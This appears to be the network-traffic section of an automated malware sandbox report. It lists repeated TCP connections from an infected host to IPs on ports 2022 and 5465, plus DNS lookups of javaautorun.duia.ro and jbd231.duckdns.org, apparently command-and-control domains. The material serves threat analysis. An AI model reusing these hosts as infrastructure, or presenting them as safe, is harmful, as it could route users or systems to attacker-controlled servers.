                  Oct 3, 2022 15:58:56.661640882 CEST497622022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:58:56.662533998 CEST497622022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:58:56.692559004 CEST202249762109.248.150.138192.168.2.5
                  Oct 3, 2022 15:58:56.692656994 CEST497622022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:58:56.696080923 CEST497622022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:58:56.724509001 CEST202249762109.248.150.138192.168.2.5
                  Oct 3, 2022 15:58:56.911077976 CEST497575465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:58:56.957933903 CEST497605465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:58:58.741506100 CEST497632022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:58:58.776624918 CEST202249763109.248.144.237192.168.2.5
                  Oct 3, 2022 15:58:58.911287069 CEST497615465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:58:59.286268950 CEST497632022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:58:59.321258068 CEST202249763109.248.144.237192.168.2.5
                  Oct 3, 2022 15:58:59.833225012 CEST497632022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:58:59.868428946 CEST202249763109.248.144.237192.168.2.5
                  Oct 3, 2022 15:59:02.965836048 CEST497642022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:59:02.994853020 CEST202249764109.248.150.138192.168.2.5
                  Oct 3, 2022 15:59:02.995042086 CEST497642022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:59:03.007718086 CEST497642022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:59:03.008986950 CEST497605465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:59:03.037729025 CEST202249764109.248.150.138192.168.2.5
                  Oct 3, 2022 15:59:03.037919998 CEST497642022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:59:03.065630913 CEST497642022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:59:03.094746113 CEST202249764109.248.150.138192.168.2.5
                  Oct 3, 2022 15:59:05.010972977 CEST497652022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:59:05.046974897 CEST202249765109.248.144.237192.168.2.5
                  Oct 3, 2022 15:59:05.083717108 CEST497615465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:59:05.609226942 CEST497665465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:59:05.646159887 CEST497652022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:59:05.681178093 CEST202249765109.248.144.237192.168.2.5
                  Oct 3, 2022 15:59:06.193061113 CEST497652022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:59:06.228102922 CEST202249765109.248.144.237192.168.2.5
                  Oct 3, 2022 15:59:08.185045958 CEST497672022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:59:08.213784933 CEST202249767109.248.150.138192.168.2.5
                  Oct 3, 2022 15:59:08.214524984 CEST497672022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:59:08.214793921 CEST497672022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:59:08.245620012 CEST202249767109.248.150.138192.168.2.5
                  Oct 3, 2022 15:59:08.245877981 CEST497672022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:59:08.245877981 CEST497672022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:59:08.275367022 CEST202249767109.248.150.138192.168.2.5
                  Oct 3, 2022 15:59:08.615336895 CEST497665465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:59:09.809777021 CEST497685465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:59:11.288896084 CEST497692022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:59:11.324278116 CEST202249769109.248.144.237192.168.2.5
                  Oct 3, 2022 15:59:11.834322929 CEST497692022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:59:11.870454073 CEST202249769109.248.144.237192.168.2.5
                  Oct 3, 2022 15:59:12.381154060 CEST497692022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:59:12.416543961 CEST202249769109.248.144.237192.168.2.5
                  Oct 3, 2022 15:59:12.818732023 CEST497685465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:59:13.418344975 CEST497702022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:59:13.446820021 CEST202249770109.248.150.138192.168.2.5
                  Oct 3, 2022 15:59:13.446916103 CEST497702022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:59:13.447659016 CEST497702022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:59:13.477875948 CEST202249770109.248.150.138192.168.2.5
                  Oct 3, 2022 15:59:13.481103897 CEST497702022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:59:13.487601995 CEST497702022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:59:13.516617060 CEST202249770109.248.150.138192.168.2.5
                  Oct 3, 2022 15:59:14.615843058 CEST497665465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:59:15.270776987 CEST497715465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:59:15.941787958 CEST497725465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:59:17.489917994 CEST497732022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:59:17.525139093 CEST202249773109.248.144.237192.168.2.5
                  Oct 3, 2022 15:59:18.037936926 CEST497732022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:59:18.073060036 CEST202249773109.248.144.237192.168.2.5
                  Oct 3, 2022 15:59:18.256683111 CEST497715465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:59:18.584824085 CEST497732022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:59:18.620156050 CEST202249773109.248.144.237192.168.2.5
                  Oct 3, 2022 15:59:18.819158077 CEST497685465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:59:18.847716093 CEST497742022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:59:18.879066944 CEST202249774109.248.150.138192.168.2.5
                  Oct 3, 2022 15:59:18.879374981 CEST497742022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:59:18.917860031 CEST497742022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:59:18.944188118 CEST497725465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:59:18.948137045 CEST202249774109.248.150.138192.168.2.5
                  Oct 3, 2022 15:59:18.948234081 CEST497742022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:59:18.950304985 CEST497742022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:59:18.979249954 CEST202249774109.248.150.138192.168.2.5
                  Oct 3, 2022 15:59:22.164644003 CEST497755465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:59:23.832480907 CEST497762022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:59:23.868191957 CEST202249776109.248.144.237192.168.2.5
                  Oct 3, 2022 15:59:24.037966013 CEST497772022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:59:24.066979885 CEST202249777109.248.150.138192.168.2.5
                  Oct 3, 2022 15:59:24.067147017 CEST497772022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:59:24.067780018 CEST497772022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:59:24.097589970 CEST202249777109.248.150.138192.168.2.5
                  Oct 3, 2022 15:59:24.097784042 CEST497772022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:59:24.105778933 CEST497772022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:59:24.134207964 CEST202249777109.248.150.138192.168.2.5
                  Oct 3, 2022 15:59:24.149779081 CEST497785465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:59:24.272877932 CEST497715465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:59:24.382323980 CEST497762022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:59:24.417494059 CEST202249776109.248.144.237192.168.2.5
                  Oct 3, 2022 15:59:24.929096937 CEST497762022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:59:24.944879055 CEST497725465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:59:24.964365959 CEST202249776109.248.144.237192.168.2.5
                  Oct 3, 2022 15:59:25.179153919 CEST497755465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:59:27.148185015 CEST497785465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:59:29.249227047 CEST497792022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:59:29.277762890 CEST202249779109.248.150.138192.168.2.5
                  Oct 3, 2022 15:59:29.277926922 CEST497792022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:59:29.278633118 CEST497792022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:59:29.336376905 CEST202249779109.248.150.138192.168.2.5
                  Oct 3, 2022 15:59:29.340481997 CEST497792022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:59:29.340600014 CEST497792022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:59:29.368611097 CEST202249779109.248.150.138192.168.2.5
                  Oct 3, 2022 15:59:30.113046885 CEST497802022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:59:30.148258924 CEST202249780109.248.144.237192.168.2.5
                  Oct 3, 2022 15:59:30.648349047 CEST497802022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:59:30.683636904 CEST202249780109.248.144.237192.168.2.5
                  Oct 3, 2022 15:59:31.179626942 CEST497755465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:59:31.195287943 CEST497802022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:59:31.230601072 CEST202249780109.248.144.237192.168.2.5
                  Oct 3, 2022 15:59:33.148567915 CEST497785465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:59:33.706605911 CEST497815465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:59:34.384447098 CEST497822022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:59:34.413211107 CEST202249782109.248.150.138192.168.2.5
                  Oct 3, 2022 15:59:34.413373947 CEST497822022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:59:34.417510033 CEST497822022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:59:34.447890043 CEST202249782109.248.150.138192.168.2.5
                  Oct 3, 2022 15:59:34.448009968 CEST497822022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:59:34.450870037 CEST497822022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:59:34.479581118 CEST202249782109.248.150.138192.168.2.5
                  Oct 3, 2022 15:59:36.318833113 CEST497832022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:59:36.354069948 CEST202249783109.248.144.237192.168.2.5
                  Oct 3, 2022 15:59:36.695739031 CEST497815465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:59:36.867671967 CEST497832022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:59:36.902645111 CEST202249783109.248.144.237192.168.2.5
                  Oct 3, 2022 15:59:37.414582014 CEST497832022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:59:37.449903011 CEST202249783109.248.144.237192.168.2.5
                  Oct 3, 2022 15:59:37.991348982 CEST497845465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:59:39.661851883 CEST497852022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:59:39.690630913 CEST202249785109.248.150.138192.168.2.5
                  Oct 3, 2022 15:59:39.690886021 CEST497852022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:59:40.597927094 CEST497852022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:59:40.628093958 CEST202249785109.248.150.138192.168.2.5
                  Oct 3, 2022 15:59:40.628264904 CEST497852022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:59:40.631833076 CEST497852022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:59:40.660614967 CEST202249785109.248.150.138192.168.2.5
                  Oct 3, 2022 15:59:41.024230003 CEST497845465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:59:42.567693949 CEST497862022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:59:42.602984905 CEST202249786109.248.144.237192.168.2.5
                  Oct 3, 2022 15:59:42.711883068 CEST497815465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:59:43.197611094 CEST497862022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:59:43.232938051 CEST202249786109.248.144.237192.168.2.5
                  Oct 3, 2022 15:59:43.345170021 CEST497875465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:59:43.743434906 CEST497862022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:59:43.778755903 CEST202249786109.248.144.237192.168.2.5
                  Oct 3, 2022 15:59:43.995562077 CEST497885465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:59:45.716044903 CEST497892022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:59:45.744860888 CEST202249789109.248.150.138192.168.2.5
                  Oct 3, 2022 15:59:45.745125055 CEST497892022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:59:45.746117115 CEST497892022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:59:45.776628017 CEST202249789109.248.150.138192.168.2.5
                  Oct 3, 2022 15:59:45.776859999 CEST497892022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:59:45.777082920 CEST497892022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:59:45.805725098 CEST202249789109.248.150.138192.168.2.5
                  Oct 3, 2022 15:59:46.352847099 CEST497875465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:59:47.009068012 CEST497885465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:59:47.040318012 CEST497845465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:59:48.855051994 CEST497902022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:59:48.890989065 CEST202249790109.248.144.237192.168.2.5
                  Oct 3, 2022 15:59:49.399975061 CEST497902022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:59:49.435545921 CEST202249790109.248.144.237192.168.2.5
                  Oct 3, 2022 15:59:49.946907997 CEST497902022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:59:49.983766079 CEST202249790109.248.144.237192.168.2.5
                  Oct 3, 2022 15:59:50.241796017 CEST497915465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:59:50.887856960 CEST497922022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:59:50.917589903 CEST202249792109.248.150.138192.168.2.5
                  Oct 3, 2022 15:59:50.917762995 CEST497922022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:59:50.918381929 CEST497922022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:59:50.948301077 CEST202249792109.248.150.138192.168.2.5
                  Oct 3, 2022 15:59:50.948682070 CEST497922022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:59:50.948857069 CEST497922022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:59:50.977468967 CEST202249792109.248.150.138192.168.2.5
                  Oct 3, 2022 15:59:52.273067951 CEST497935465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:59:52.354417086 CEST497875465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:59:53.009731054 CEST497885465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:59:53.243983984 CEST497915465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:59:55.087454081 CEST497942022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:59:55.123315096 CEST202249794109.248.144.237192.168.2.5
                  Oct 3, 2022 15:59:55.275739908 CEST497935465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:59:55.634980917 CEST497942022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:59:55.670406103 CEST202249794109.248.144.237192.168.2.5
                  Oct 3, 2022 15:59:56.181736946 CEST497942022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:59:56.217295885 CEST202249794109.248.144.237192.168.2.5
                  Oct 3, 2022 15:59:56.381074905 CEST497952022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:59:56.409399986 CEST202249795109.248.150.138192.168.2.5
                  Oct 3, 2022 15:59:56.409538031 CEST497952022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:59:56.411391973 CEST497952022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:59:56.441909075 CEST202249795109.248.150.138192.168.2.5
                  Oct 3, 2022 15:59:56.442075014 CEST497952022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:59:56.459430933 CEST497952022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:59:56.487515926 CEST202249795109.248.150.138192.168.2.5
                  Oct 3, 2022 15:59:59.291371107 CEST497915465192.168.2.5154.120.126.87
                  Oct 3, 2022 16:00:01.291583061 CEST497935465192.168.2.5154.120.126.87
                  Oct 3, 2022 16:00:01.445964098 CEST497962022192.168.2.5109.248.150.138
                  Oct 3, 2022 16:00:01.460860968 CEST497972022192.168.2.5109.248.144.237
                  Oct 3, 2022 16:00:01.474498034 CEST202249796109.248.150.138192.168.2.5
                  Oct 3, 2022 16:00:01.474633932 CEST497962022192.168.2.5109.248.150.138
                  Oct 3, 2022 16:00:01.475367069 CEST497962022192.168.2.5109.248.150.138
                  Oct 3, 2022 16:00:01.495979071 CEST202249797109.248.144.237192.168.2.5
                  Oct 3, 2022 16:00:01.505105972 CEST202249796109.248.150.138192.168.2.5
                  Oct 3, 2022 16:00:01.505286932 CEST497962022192.168.2.5109.248.150.138
                  Oct 3, 2022 16:00:01.505382061 CEST497962022192.168.2.5109.248.150.138
                  Oct 3, 2022 16:00:01.534218073 CEST202249796109.248.150.138192.168.2.5
                  Oct 3, 2022 16:00:01.790288925 CEST497985465192.168.2.5154.120.126.87
                  Oct 3, 2022 16:00:02.010319948 CEST497972022192.168.2.5109.248.144.237
                  Oct 3, 2022 16:00:02.045432091 CEST202249797109.248.144.237192.168.2.5
                  Oct 3, 2022 16:00:02.557250977 CEST497972022192.168.2.5109.248.144.237
                  Oct 3, 2022 16:00:02.592303038 CEST202249797109.248.144.237192.168.2.5
                  Oct 3, 2022 16:00:04.776376009 CEST497985465192.168.2.5154.120.126.87
                  Oct 3, 2022 16:00:06.172949076 CEST497995465192.168.2.5154.120.126.87
                  Oct 3, 2022 16:00:06.654750109 CEST498002022192.168.2.5109.248.150.138
                  Oct 3, 2022 16:00:06.683249950 CEST202249800109.248.150.138192.168.2.5
                  Oct 3, 2022 16:00:06.683446884 CEST498002022192.168.2.5109.248.150.138
                  Oct 3, 2022 16:00:06.684129000 CEST498002022192.168.2.5109.248.150.138
                  Oct 3, 2022 16:00:06.713923931 CEST202249800109.248.150.138192.168.2.5
                  Oct 3, 2022 16:00:06.715804100 CEST498002022192.168.2.5109.248.150.138
                  Oct 3, 2022 16:00:06.716008902 CEST498002022192.168.2.5109.248.150.138
                  Oct 3, 2022 16:00:06.743992090 CEST202249800109.248.150.138192.168.2.5
                  Oct 3, 2022 16:00:07.666264057 CEST498012022192.168.2.5109.248.144.237
                  Oct 3, 2022 16:00:07.701791048 CEST202249801109.248.144.237192.168.2.5
                  Oct 3, 2022 16:00:08.213984966 CEST498012022192.168.2.5109.248.144.237
                  Oct 3, 2022 16:00:08.253211021 CEST202249801109.248.144.237192.168.2.5
                  Oct 3, 2022 16:00:08.760940075 CEST498012022192.168.2.5109.248.144.237
                  Oct 3, 2022 16:00:08.796256065 CEST202249801109.248.144.237192.168.2.5
                  Oct 3, 2022 16:00:09.182820082 CEST497995465192.168.2.5154.120.126.87
                  Oct 3, 2022 16:00:10.776885033 CEST497985465192.168.2.5154.120.126.87
                  Oct 3, 2022 16:00:11.429347992 CEST498025465192.168.2.5154.120.126.87
                  Oct 3, 2022 16:00:11.864799976 CEST498032022192.168.2.5109.248.150.138
                  Oct 3, 2022 16:00:11.894190073 CEST202249803109.248.150.138192.168.2.5
                  Oct 3, 2022 16:00:11.894411087 CEST498032022192.168.2.5109.248.150.138
                  Oct 3, 2022 16:00:11.895919085 CEST498032022192.168.2.5109.248.150.138
                  Oct 3, 2022 16:00:11.926346064 CEST202249803109.248.150.138192.168.2.5
                  Oct 3, 2022 16:00:11.926501036 CEST498032022192.168.2.5109.248.150.138
                  Oct 3, 2022 16:00:11.939341068 CEST498032022192.168.2.5109.248.150.138
                  Oct 3, 2022 16:00:11.968449116 CEST202249803109.248.150.138192.168.2.5
                  Oct 3, 2022 16:00:12.076139927 CEST498045465192.168.2.5154.120.126.87
                  Oct 3, 2022 16:00:13.894169092 CEST498052022192.168.2.5109.248.144.237
                  Oct 3, 2022 16:00:13.929568052 CEST202249805109.248.144.237192.168.2.5
                  Oct 3, 2022 16:00:14.417700052 CEST498025465192.168.2.5154.120.126.87
                  Oct 3, 2022 16:00:14.433311939 CEST498052022192.168.2.5109.248.144.237
                  Oct 3, 2022 16:00:14.468575954 CEST202249805109.248.144.237192.168.2.5
                  Oct 3, 2022 16:00:14.980354071 CEST498052022192.168.2.5109.248.144.237
                  Oct 3, 2022 16:00:15.016459942 CEST202249805109.248.144.237192.168.2.5
                  Oct 3, 2022 16:00:15.089656115 CEST498045465192.168.2.5154.120.126.87
                  Oct 3, 2022 16:00:15.183407068 CEST497995465192.168.2.5154.120.126.87
                  Oct 3, 2022 16:00:17.018284082 CEST498062022192.168.2.5109.248.150.138
                  Oct 3, 2022 16:00:17.047437906 CEST202249806109.248.150.138192.168.2.5
                  Oct 3, 2022 16:00:17.050755024 CEST498062022192.168.2.5109.248.150.138
                  Oct 3, 2022 16:00:17.051646948 CEST498062022192.168.2.5109.248.150.138
                  Oct 3, 2022 16:00:17.081424952 CEST202249806109.248.150.138192.168.2.5
                  Oct 3, 2022 16:00:17.081532955 CEST498062022192.168.2.5109.248.150.138
                  Oct 3, 2022 16:00:17.081682920 CEST498062022192.168.2.5109.248.150.138
                  Oct 3, 2022 16:00:17.110318899 CEST202249806109.248.150.138192.168.2.5
                  Oct 3, 2022 16:00:18.366517067 CEST498075465192.168.2.5154.120.126.87
                  Oct 3, 2022 16:00:20.418179989 CEST498025465192.168.2.5154.120.126.87
                  Oct 3, 2022 16:00:21.105746984 CEST498045465192.168.2.5154.120.126.87
                  Oct 3, 2022 16:00:21.371336937 CEST498075465192.168.2.5154.120.126.87
                  Oct 3, 2022 16:00:27.496874094 CEST498075465192.168.2.5154.120.126.87

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Oct 3, 2022 15:56:25.945163965 CEST6189353192.168.2.58.8.8.8
                  Oct 3, 2022 15:56:25.981889963 CEST53618938.8.8.8192.168.2.5
                  Oct 3, 2022 15:56:42.403424025 CEST6064953192.168.2.58.8.8.8
                  Oct 3, 2022 15:56:43.451083899 CEST6064953192.168.2.58.8.8.8
                  Oct 3, 2022 15:56:44.484040976 CEST5144153192.168.2.58.8.8.8
                  Oct 3, 2022 15:56:44.486901999 CEST6064953192.168.2.58.8.8.8
                  Oct 3, 2022 15:56:44.514353037 CEST53606498.8.8.8192.168.2.5
                  Oct 3, 2022 15:56:44.517643929 CEST53514418.8.8.8192.168.2.5
                  Oct 3, 2022 15:56:48.471168995 CEST53606498.8.8.8192.168.2.5
                  Oct 3, 2022 15:56:49.506131887 CEST53606498.8.8.8192.168.2.5
                  Oct 3, 2022 15:56:53.876792908 CEST4917753192.168.2.58.8.8.8
                  Oct 3, 2022 15:56:53.908386946 CEST53491778.8.8.8192.168.2.5
                  Oct 3, 2022 15:57:02.906929970 CEST4972453192.168.2.58.8.8.8
                  Oct 3, 2022 15:57:02.944133043 CEST53497248.8.8.8192.168.2.5
                  Oct 3, 2022 15:57:29.059144974 CEST6532353192.168.2.58.8.8.8
                  Oct 3, 2022 15:57:29.077153921 CEST53653238.8.8.8192.168.2.5
                  Oct 3, 2022 15:57:41.592298031 CEST5148453192.168.2.58.8.8.8
                  Oct 3, 2022 15:57:42.586081028 CEST5148453192.168.2.58.8.8.8
                  Oct 3, 2022 15:57:43.608944893 CEST5148453192.168.2.58.8.8.8
                  Oct 3, 2022 15:57:43.729804039 CEST6344653192.168.2.58.8.8.8
                  Oct 3, 2022 15:57:43.764605999 CEST53634468.8.8.8192.168.2.5
                  Oct 3, 2022 15:57:46.374825001 CEST5148453192.168.2.58.8.8.8
                  Oct 3, 2022 15:57:46.609219074 CEST53514848.8.8.8192.168.2.5
                  Oct 3, 2022 15:57:47.604291916 CEST53514848.8.8.8192.168.2.5
                  Oct 3, 2022 15:57:48.626853943 CEST53514848.8.8.8192.168.2.5
                  Oct 3, 2022 15:57:49.485599041 CEST53514848.8.8.8192.168.2.5
                  Oct 3, 2022 15:57:51.709530115 CEST5675153192.168.2.58.8.8.8
                  Oct 3, 2022 15:57:51.824341059 CEST53567518.8.8.8192.168.2.5

                  ICMP Packets

                  TimestampSource IPDest IPChecksumCodeType
                  Oct 3, 2022 15:56:48.473455906 CEST192.168.2.58.8.8.8cff7(Port unreachable)Destination Unreachable
                  Oct 3, 2022 15:56:49.506257057 CEST192.168.2.58.8.8.8cff7(Port unreachable)Destination Unreachable
                  Oct 3, 2022 15:57:47.604485035 CEST192.168.2.58.8.8.8cff7(Port unreachable)Destination Unreachable
                  Oct 3, 2022 15:57:48.627017021 CEST192.168.2.58.8.8.8cff7(Port unreachable)Destination Unreachable
                  Oct 3, 2022 15:57:49.485771894 CEST192.168.2.58.8.8.8d007(Port unreachable)Destination Unreachable

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Oct 3, 2022 15:56:25.945163965 CEST192.168.2.58.8.8.80xc3fbStandard query (0)javaautorun.duia.roA (IP address)IN (0x0001)false
                  Oct 3, 2022 15:56:42.403424025 CEST192.168.2.58.8.8.80xa19eStandard query (0)jbd231.duckdns.orgA (IP address)IN (0x0001)false
                  Oct 3, 2022 15:56:43.451083899 CEST192.168.2.58.8.8.80xa19eStandard query (0)jbd231.duckdns.orgA (IP address)IN (0x0001)false
                  Oct 3, 2022 15:56:44.484040976 CEST192.168.2.58.8.8.80xb2c4Standard query (0)javaautorun.duia.roA (IP address)IN (0x0001)false
                  Oct 3, 2022 15:56:44.486901999 CEST192.168.2.58.8.8.80xa19eStandard query (0)jbd231.duckdns.orgA (IP address)IN (0x0001)false
                  Oct 3, 2022 15:56:53.876792908 CEST192.168.2.58.8.8.80x6be5Standard query (0)javaautorun.duia.roA (IP address)IN (0x0001)false
                  Oct 3, 2022 15:57:02.906929970 CEST192.168.2.58.8.8.80x91d8Standard query (0)javaautorun.duia.roA (IP address)IN (0x0001)false
                  Oct 3, 2022 15:57:29.059144974 CEST192.168.2.58.8.8.80xdfc8Standard query (0)javaautorun.duia.roA (IP address)IN (0x0001)false
                  Oct 3, 2022 15:57:41.592298031 CEST192.168.2.58.8.8.80x302Standard query (0)jbd231.duckdns.orgA (IP address)IN (0x0001)false
                  Oct 3, 2022 15:57:42.586081028 CEST192.168.2.58.8.8.80x302Standard query (0)jbd231.duckdns.orgA (IP address)IN (0x0001)false
                  Oct 3, 2022 15:57:43.608944893 CEST192.168.2.58.8.8.80x302Standard query (0)jbd231.duckdns.orgA (IP address)IN (0x0001)false
                  Oct 3, 2022 15:57:43.729804039 CEST192.168.2.58.8.8.80xa111Standard query (0)javaautorun.duia.roA (IP address)IN (0x0001)false
                  Oct 3, 2022 15:57:46.374825001 CEST192.168.2.58.8.8.80x302Standard query (0)jbd231.duckdns.orgA (IP address)IN (0x0001)false
                  Oct 3, 2022 15:57:51.709530115 CEST192.168.2.58.8.8.80x365eStandard query (0)jbd231.duckdns.orgA (IP address)IN (0x0001)false

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Oct 3, 2022 15:56:25.981889963 CEST8.8.8.8192.168.2.50xc3fbNo error (0)javaautorun.duia.ro154.120.126.87A (IP address)IN (0x0001)false
                  Oct 3, 2022 15:56:44.514353037 CEST8.8.8.8192.168.2.50xa19eNo error (0)jbd231.duckdns.org109.248.144.237A (IP address)IN (0x0001)false
                  Oct 3, 2022 15:56:44.517643929 CEST8.8.8.8192.168.2.50xb2c4No error (0)javaautorun.duia.ro154.120.126.87A (IP address)IN (0x0001)false
                  Oct 3, 2022 15:56:48.471168995 CEST8.8.8.8192.168.2.50xa19eServer failure (2)jbd231.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                  Oct 3, 2022 15:56:49.506131887 CEST8.8.8.8192.168.2.50xa19eServer failure (2)jbd231.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                  Oct 3, 2022 15:56:53.908386946 CEST8.8.8.8192.168.2.50x6be5No error (0)javaautorun.duia.ro154.120.126.87A (IP address)IN (0x0001)false
                  Oct 3, 2022 15:57:02.944133043 CEST8.8.8.8192.168.2.50x91d8No error (0)javaautorun.duia.ro154.120.126.87A (IP address)IN (0x0001)false
                  Oct 3, 2022 15:57:29.077153921 CEST8.8.8.8192.168.2.50xdfc8No error (0)javaautorun.duia.ro154.120.126.87A (IP address)IN (0x0001)false
                  Oct 3, 2022 15:57:43.764605999 CEST8.8.8.8192.168.2.50xa111No error (0)javaautorun.duia.ro154.120.126.87A (IP address)IN (0x0001)false
                  Oct 3, 2022 15:57:46.609219074 CEST8.8.8.8192.168.2.50x302Server failure (2)jbd231.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                  Oct 3, 2022 15:57:47.604291916 CEST8.8.8.8192.168.2.50x302Server failure (2)jbd231.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                  Oct 3, 2022 15:57:48.626853943 CEST8.8.8.8192.168.2.50x302Server failure (2)jbd231.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                  Oct 3, 2022 15:57:49.485599041 CEST8.8.8.8192.168.2.50x302No error (0)jbd231.duckdns.org109.248.150.138A (IP address)IN (0x0001)false
